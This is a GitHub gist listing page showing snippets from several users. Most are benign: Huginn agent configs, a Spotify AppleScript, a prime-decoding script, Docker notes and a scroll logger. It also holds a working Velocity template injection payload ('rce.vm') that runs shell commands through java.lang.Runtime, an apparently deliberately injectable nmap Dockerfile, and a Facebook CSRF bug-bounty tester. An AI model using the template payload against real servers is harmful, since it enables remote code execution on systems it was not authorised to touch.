Skip to content

Instantly share code, notes, and snippets.

View 0xdevalias's full-sized avatar
👀
Open to opportunities

Glenn 'devalias' Grant 0xdevalias

👀
Open to opportunities
380 followers · 221 following
View GitHub Profile
@dsander
dsander / WebsiteAgentChain.json
Last active August 29, 2015 14:02
{
"name": "Website Agents",
"description": "No description provided",
"source_url": false,
"guid": "bc515f995bae4e9e03c8facb03802ba3",
"exported_at": "2014-06-22T07:33:58Z",
"agents": [
{
"type": "Agents::WebsiteAgent",
"name": "WebsiteAgent 1",
@0xdevalias
0xdevalias / my-opinionated-typesafe-stack.md
Last active August 29, 2015 14:10
My Opinionated Typesafe Stack
anonymous
anonymous / spotifyInfo
Created November 3, 2014 22:38
tell application "Spotify"
set myTrack to name of current track
set myArtist to artist of current track
set myAlbum to album of current track
set tM to round ((duration of current track) / 60) rounding down
set tS to (duration of current track) mod 60
set myTime to ((tM as text) & "min " & tS as text) & "s"
set nM to round (player position / 60) rounding down
set nS to round (player position mod 60) rounding down
set nowAt to ((nM as text) & "min " & nS as text) & "s"
@majaha
majaha / decode-illegal-prime.py
Created May 6, 2016 19:38
#!/bin/python3
fr = open("prime.txt")
s = fr.read(2000)
s = s.replace("\n","").replace(" ","")
i = int(s)
fw = open("prime.gz","wb")
@inkel
inkel / docker_container_size.md
Last active February 26, 2017 03:50

Using the following Dockerfile:

FROM alpine:3.2

RUN apk update
RUN apk add gcc
RUN apk del --purge gcc

ENTRYPOINT ["sh"]
@h3xstream
h3xstream / rce.vm
Last active June 6, 2017 03:00
RCE in velocity template when no extension enable
#set($x='')##
#set($rt=$x.class.forName('java.lang.Runtime'))##
#set($chr=$x.class.forName('java.lang.Character'))##
#set($str=$x.class.forName('java.lang.String'))##
#set($ex=$rt.getRuntime().exec('ls'))##
$ex.waitFor()
#set($out=$ex.getInputStream())##
#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
@debasishm89
debasishm89 / fbxsrf.py
Last active July 24, 2017 09:08
This Burpy (https://github.com/debasishm89/burpy) module is specially written to find CSRF vulnerability in Facebook Application.
from rawweb import *
def main(raw_stream,ssl):
'''
This Burpy module is specially written to find CSRF vulnerability in Facebook Application.
It has already found few minor CSRF vulnerability in FB application. Few them was qualifed for Bug Bounty.
It simply checks whether CSRF token validation is present in Server Side or not by removing token
from request and replaying it.Facebook application always throws a generic error message for CSRF error which is
"Please try closing and re-opening your browser". If this error is not present in response after removing the token
it returns +ve.
'''
@RByers
RByers / Logging programattic scrolls
Last active August 15, 2017 10:34 — forked from majido/detectProgrammaticScroll.js
Script to be pasted into developer tools to log calls to programmatic scrolling APIs. Currently tested just on Chrome and Firefox.
(function(){
// Override function in given prototype to add a log statement
function logMethod(prototype, fname) {
var name = prototype.constructor.name + '.' + fname;
if (!(fname in prototype)) {
console.warn("Warning: can't instrument " + name);
return;
}
console.log("Instrumenting " + name);
var original = prototype[fname];
@h-a-t-zz
h-a-t-zz / Dockerfile
Last active November 10, 2017 22:57
nmap RCE
FROM alexellis2/faas-alpinefunction:latest
RUN apk update && apk add nmap
ENV fprocess="xargs nmap"
CMD ["fwatchdog"]
@snicker
snicker / README.md
Last active November 30, 2017 04:58
Huginn Scenario - Music Snatcher for Headphones

MusicSnatcher

a huginn scenario

a snicker joint

what